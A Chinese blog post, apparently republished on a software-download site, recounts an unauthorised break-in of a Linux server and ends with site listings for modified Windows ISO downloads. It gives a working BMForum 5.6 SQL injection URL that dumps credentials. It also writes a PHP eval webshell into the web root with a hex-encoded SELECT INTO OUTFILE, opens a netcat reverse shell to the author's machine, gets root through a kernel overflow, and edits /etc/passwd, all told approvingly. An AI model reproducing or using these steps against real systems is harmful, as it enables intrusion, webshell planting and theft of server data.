linux系统从入侵到提权的详细过程(图文)
上个J8,就是那个上网检测东西。。
其实记录的很详细,没有加密的聊天内容都可以看到。我还是比较尊重他人隐私的,所以只查看了一些上网行为。
刚才说了,扫了一下那个网段的80端口,有一个开着,就点进去看了一下,是BMForum 2007 5.6的论坛,php的。
老系统了,记得前几年爆了个注入,也不知道是不是这个版本,上db-exploit看了一下,艹,中枪了。
————————-下面的来自db-exploit————————
BMForum 5.6 (tagname) Remote SQL Injection Vulnerability
Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: BMForum
Version: 5.6
URL: www.bmforum.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit:
http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1′+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*
# milw0rm.com [2008-10-01]
于是乎….
不用猜你就懂了,密码是admin。
进后台了,这个模式我不是很喜欢,翻了半天没找到能上传的地方。上J8。
不过,还是好好找,依然能找到可以利用的东西,发现了这个后台有phpinfo()和SQL执行。
看了一下,是root权限,也得到了web目录,如果没开启魔术引号,可以考虑into outfile。
补一句:mysql的root权限在linux下一般没什么用,有写权限就不错了,如果是windows系统,可以考虑导出udf.dll。
管理员百密一疏啊,没开魔术引号~~蛤蛤,大快人心!!~
直接select一句话木马,然后导出到文件~~
下面那一段十六进制字符串是www.jb51.net <?php eval($_REQUEST[fuck]);?> 的hex值
select 0x3C3F706870206576616C28245F524551554553545B6675636B5D293B3F3E into outfile ‘/usr/local/bmf/bmb/datafile/x.php’
然后成功得到shell。如图。
接下来,试试菜刀里能不能执行命令,下面就要考虑提权了。
试了一下,看似可以执行命令,也得到了一些服务器信息。
2.6.9-22的内核,有溢出。
这个终端有个毛病,就是不能即时回显,毕竟是通过webshell虚拟的终端,所以,还需要nc来反弹一个shell,用于溢出。
这个服务器上已经装了nc,可是是阉割过的,不能指向bash,所以,下载源码,编译。
用wget在sourceforge.net上下载,就不多说了。。
编译什么的,也是so easy。实在不行就百度一个i386架构下编译的linux版netcat。
下面的工作就是要反弹shell了,一台外网的机子是必须的,就算不是外网,能映射也行。
刚好手头有个映射过端口的服务器,如果是外网服务器,就更简单了,详见netcat使用帮助。
http://wenku.baidu.com/view/f77334ee19e8b8f67c1cb9fe.html
好了,开始反弹吧。。。
很好,反弹成功,已经可以执行一些低权限的命令的。
接着提权吧。上传了一个叫做“x”的程序,用于溢出。
蛤蛤,溢出成功了,已经是root权限了,下面加用户什么的就不说了,你懂的~~
唠叨一句,变身成root的方法。。。修改/etc/passwd
这是我用pietty连接ssh之后,查看passwd,已经改成root了
作者 sunrise@luzix.com from:情'blog
推荐系统
番茄花园 Windows 10 极速企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10番茄花园 Windows 10 32位极速企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
新萝卜家园电脑城专用系统 Windows10 x86 企业版 版本1507 2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新萝卜家园电脑城专用系统 Windows10 x86企业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10笔记本台式机专用系统 Windows 10 32位企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过
笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年7月(64位) 提供下载
语言:中文版系统大小:3.98GB系统类型:Win10笔记本台式机专用系统 Windows10 64专业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的专业版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动
雨林木风 Windows10 x64 企业装机版 版本1903 2022年7月(64位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新雨林木风 Windows10 x64 企业装机版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
深度技术 Windows 10 x64 企业版 电脑城装机版 版本1903 2022年7月(64位) 高速下载
语言:中文版系统大小:3.98GB系统类型:Win10深度技术 Windows 10 x64 企业TLSB 电脑城装机版2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
电脑公司 装机专用系统Windows10 x64 企业版2022年7月(64位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10电脑公司 装机专用系统 Windows10 x64 企业TLSB版2022年7月一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过
新雨林木风 Windows10 x86 企业装机版2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.15GB系统类型:Win10新雨林木风 Windows10 x86 专业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的专业版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活系统,无
相关文章
- 企业局域网如何监控共享文件的访问日志、局域网共享文件监控、记录共享文件访问日志的
- 个人主机 入侵网络攻击的步骤
- 战略战争游戏DropTeam多个远程安全漏洞
- 微软全系统建立隐藏账户漏洞分析
- Intel第三代新品Core i3-3240处理器性能评测
- IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞
- win7总是提示Windows安全让输入网络密码怎么办?
- 物联网时代到来 你准备好在摄像头下保护好你的隐私了吗
- 迅雷链张慧勇:区块链安全威胁及防护思路分析
- IT故障排查工作中的六条不变法则
- 网购DIY电脑常见故障的解决办法
- Libpng库未知类型块处理远程代码执行漏洞
- 如何禁止微信使用和微信传文件、教大家禁止电脑文件外发的方法
- Win10系统网络诊断工具在哪?Win10系统诊断工具解决上网问题的使用方法图文教程
热门系统
- 1华硕笔记本&台式机专用系统 GhostWin7 32位正式旗舰版2018年8月(32位)ISO镜像下载
- 2雨林木风 Ghost Win7 SP1 装机版 2020年4月(32位) 提供下载
- 3深度技术 Windows 10 x86 企业版 电脑城装机版2018年10月(32位) ISO镜像免费下载
- 4电脑公司 装机专用系统Windows10 x86喜迎国庆 企业版2020年10月(32位) ISO镜像快速下载
- 5深度技术 Windows 10 x86 企业版 六一节 电脑城装机版 版本1903 2022年6月(32位) ISO镜像免费下载
- 6深度技术 Windows 10 x64 企业版 电脑城装机版2021年1月(64位) 高速下载
- 7新萝卜家园电脑城专用系统 Windows10 x64 企业版2019年10月(64位) ISO镜像免费下载
- 8新萝卜家园 GhostWin7 SP1 最新电脑城极速装机版2018年8月(32位)ISO镜像下载
- 9电脑公司Ghost Win8.1 x32 精选纯净版2022年5月(免激活) ISO镜像高速下载
- 10新萝卜家园Ghost Win8.1 X32 最新纯净版2018年05(自动激活) ISO镜像免费下载
热门文章
- 1华为手环6pro有游泳功能吗-支持游泳模式吗
- 2重装上阵新赛季有哪些重型武器_重装上阵新赛季重型武器列表
- 3使用win7中本地搜索功能时四个技巧快速找到文件的操作方如何用win7的搜索功能法
- 4premiere怎么更改素材序列? premiere更改序列设置的方法
- 5天天酷跑布鲁与冰原狼仔哪一个好 布鲁好还是冰原狼仔好
- 6斐讯k1路由器刷Breed BootLoader(不死UBoot)教程
- 7路由器密码忘了怎么办 无线路由器登陆密码忘了解决方法【详解】
- 8战双帕弥什超频晶币极如何获得_战双帕弥什超频晶币极获得方法
- 9Redmi AirDots 3 Pro体验如何 Redmi AirDots 3 Pro详细评测
- 10安全事件应急响应工具箱
常用系统
- 1深度技术 Ghost Win7 x64 Sp1 电脑城纯净版2022年6月(64位) ISO镜像高速下载
- 2电脑公司Ghost Win7 Sp1 装机万能版2022年3月(32位) 提供下载
- 3电脑公司 装机专用系统Windows10 x86企业版 版本1507 2022年4月(32位) ISO镜像快速下载
- 4雨林木风系统 Ghost XP SP3 装机版 YN2022年7月 ISO镜像高速下载
- 5电脑公司Ghost Win7 x64 Sp1装机万能版2018年4月(64位) ISO镜像免费下载
- 6雨林木风 Ghost Win7 SP1 六一节 装机版 2020年6月(32位) 提供下载
- 7新雨林木风 Windows10 x86 企业装机版2021年10月(32位) ISO镜像高速下载
- 8深度技术 Windows 10 x86 企业版 中秋特别 电脑城装机版 版本1903 2021年9月(32位) ISO镜像免费下载
- 9新萝卜家园Ghost Win8.1 X64位 纯净版2021年10月(自动激活) ISO镜像高费下载
- 10番茄花园Ghost Win8.1 x64 办公纯净版2021年11月(激活版) ISO镜像高速下载